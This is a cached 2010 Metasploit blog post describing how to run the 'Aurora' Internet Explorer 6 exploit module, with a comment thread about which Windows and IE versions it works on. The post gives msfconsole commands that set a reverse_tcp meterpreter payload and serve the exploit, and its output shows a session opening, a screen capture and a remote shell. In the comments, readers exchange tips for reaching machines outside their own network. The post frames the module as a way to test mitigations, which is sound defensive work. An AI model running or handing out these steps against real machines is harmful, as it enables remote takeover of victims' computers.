(cache) Metasploit: Reproducing the "Aurora" IE Exploit

Friday, January 15, 2010

Reproducing the "Aurora" IE Exploit

Update: This module, just like the original exploit, only works on IE6 at this time. IE7 requires a slightly different method to reuse the object pointer and IE8 enables DEP by default.

Yesterday, a copy of the unpatched Internet Explorer exploit used in the Aurora attacks was uploaded to Wepawet. Since the code is now public, we ported this to a Metasploit module in order to provide a safe way to test your workarounds and mitigation efforts.

To get started, grab the latest copy of the Metasploit Framework and use the online update feature to sync latest exploits from the development tree. Start the Metasploit Console (msfconsole) and enter the commands in bold:

msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST (your IP)
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit

[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*] Local IP: http://192.168.0.151:8080/
[*] Server started.

msf exploit(ie_aurora) >

Open Internet Explorer on a vulnerable machine (we tested Windows XP SP3 with IE 6) and enter the Local IP URL into the browser. If the exploit succeeds, you should see a new session in the Metasploit Console:

[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)

msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WINXP\Developer

meterpreter > use espia
Loading extension espia...success.

meterpreter > screenshot aurora.bmp

meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Developer\Desktop>

19 comments:

Anonymous said...: Failed on IE 6 on Windows 2003 SP1
failed on IE 8 on Windows 7 RC1; 5:17:00 PM
Medt said...: Fast Update. Thanks For Penetration Tools; 12:07:00 AM
Anonymous said...: thanks. i tried it with xp sp3 and ie7. seems not to work properly. the browser crashes though.; 6:47:00 AM
Anonymous said...: seems not to work with ie7; 6:52:00 AM
dandart said...: Doesn't seem to work with IE8/XPSP3 - it just crashes the tab.; 9:20:00 AM
Par said...: IE6 running on XP SP3 with the following patches missing is invulnerable to your exploit:

Security Update for Windows XP (KB972270)
Windows Malicious Software Removal Tool - January 2010 (KB890830)
Cumulative Security Update for Internet Explorer 6 for Windows XP (KB976325)
Security Update for Windows XP (KB974318)
Security Update for Windows XP (KB974392)
Update for Windows XP (KB955759)
Security Update for Windows XP (KB973904)
Update for Windows XP (KB973687)
Update for Windows XP (KB976098)
Security Update for Windows XP (KB969947)
Microsoft .NET Framework 2.0 Service Pack 2 Security Update for Windows 2000, Windows Server 2003, and Windows XP (KB974417)
Cumulative Security Update for ActiveX Killbits for Windows XP (KB973525)
Security Update for Windows Media Format Runtime 9, 9.5 & 11 for Windows XP SP 3 (KB954155)
Security Update for Windows XP (KB975025)
Security Update for Windows XP (KB974571)
Security Update for Windows XP (KB974112)
Security Update for Windows XP (KB971486)
Security Update for Windows XP (KB958869)
Security Update for Windows XP (KB969059)
Security Update for Microsoft XML Core Services 4.0 Service Pack 2 (KB954430)
Update for Windows XP (KB968389)
Security Update for Windows XP (KB956844)
Security Update for Jscript 5.7 for Windows XP (KB971961)
Security Update for Windows Media Format Runtime 9, 9.5 & 11 for Windows XP SP 3 (KB968816)
Security Update for Windows XP (KB971557)
Security Update for Windows XP Service Pack 3 (KB973540)
Security Update for Windows XP (KB973869)
Security Update for Windows XP (KB956744)
Security Update for Windows XP (KB973354)
Security Update for Windows XP (KB973507)
Security Update for Windows XP (KB960859)
Security Update for Windows XP (KB973815)
Security Update for Windows XP (KB971657)
Update to .NET Framework 3.5 Service Pack 1 for the .NET Framework Assistant 1.0 x86 (KB963707)
Security Update for Windows XP (KB961501)
Security Update for Windows XP (KB970238)
Security Update for Windows XP (KB963093)
Security Update for Windows XP (KB923561)
Security Update for Windows XP (KB956572)
Security Update for Windows XP (KB952004)
Security Update for Windows XP (KB960803)
Security Update for Windows XP (KB959426)
Windows Genuine Advantage Notification (KB905474)
Update for Windows XP (KB961118)
Security Update for Microsoft Office Outlook 2007 (KB972363)
Update for Microsoft Office Outlook 2007 Junk Email Filter (KB977839)
Update for Microsoft Office InfoPath 2007 (KB976416)
Office Genuine Advantage Notifications (KB949810)
Security Update for Microsoft Office Excel 2007 (KB973593)
Security Update for the 2007 Microsoft Office System (KB973704)
Security Update for the 2007 Microsoft Office System (KB974234)
Security Update for the 2007 Microsoft Office System (KB972581)
Security Update for Microsoft Office Visio Viewer 2007 (KB973709)
Security Update for Microsoft Office Publisher 2007 (KB969693)
Security Update for the 2007 Microsoft Office System (KB969613)
Security Update for Microsoft Office Word 2007 (KB969604)
Security Update for the 2007 Microsoft Office System (KB969559)
Update for the 2007 Microsoft Office System (KB967642)
Security Update for Microsoft PowerPoint 2007 (KB957789); 11:41:00 PM
Anonymous said...: Does not reproduce on XP SP2 nor SP3.
Tested with both IE6&7; 6:14:00 AM
hdm said...: No crash, or no shell?; 6:22:00 AM
Crewl-T6 said...: Crashes on:

XP SP3 IE7
XP SP3 IE8; 8:30:00 AM
Anonymous said...: XP SP3 with IE7 reproduced nothing.... no shell and no crash.; 10:01:00 AM
marco000 said...: I was able to get a shell on IE 6/SP2. On IE7 and IE8 with SP2 I was only able to get a crash, even with system wide DEP disabled. SP3 and IE8 also only resulted in crashes, no shell.; 11:43:00 AM
Anonymous said...: i wanna test this on a pc outside my network using my friend's pc (w/ his permission of course)so what i did is,

i set the:
* SRVHOST and LHOST to 192.168.1.29 (my local IP)
* SRVPORT to 8080
* portforwarded 4444 and 8080 on my router

but when i gave the link to my friend, it doesn't work. the link i used is http://myexternalip:8080/URIPATH

any ideas guys?; 11:37:00 PM
Anonymous said...: XP SP3 IE7 and Win7 IE8 only crashes. no shell.; 1:43:00 AM
hdm said...: LHOST would need to be your external IP, not your internal; 3:55:00 AM
Anonymous said...: Works only local with internal IP. If I enter my external IP I get:getaddrinfo: Non-recoverable failure in name resolution.
Host is FreeBSD 8; 7:15:00 AM
Mapache said...: Works fine with:

Windows XP SP2 (English) and IE6

I had to do it twice. The first time the Browser crashed without creating a session.
The second time it worked as expected.; 8:06:00 AM
hdm said...: That is pretty common for heap fill - the first time the heap was already in a state where the target address could not be reached.; 8:08:00 AM
John said...: Working on XP(32) SP3 IE6 on second attempt.
Crashed XP(32) IE7.
Crashed Win7(64) IE8.

Thanks for the good work HDM.

John; 12:55:00 PM
Anonymous said...: VUPEN released an exploit for IE 8which bypasses DEP.

http://www.vupen.com/exploits

However, it is not public.; 8:17:00 AM

Friday, January 15, 2010

Reproducing the "Aurora" IE Exploit

19 comments:

Links

Blogs

Archive

Metasploit Framework: Activity

Twitter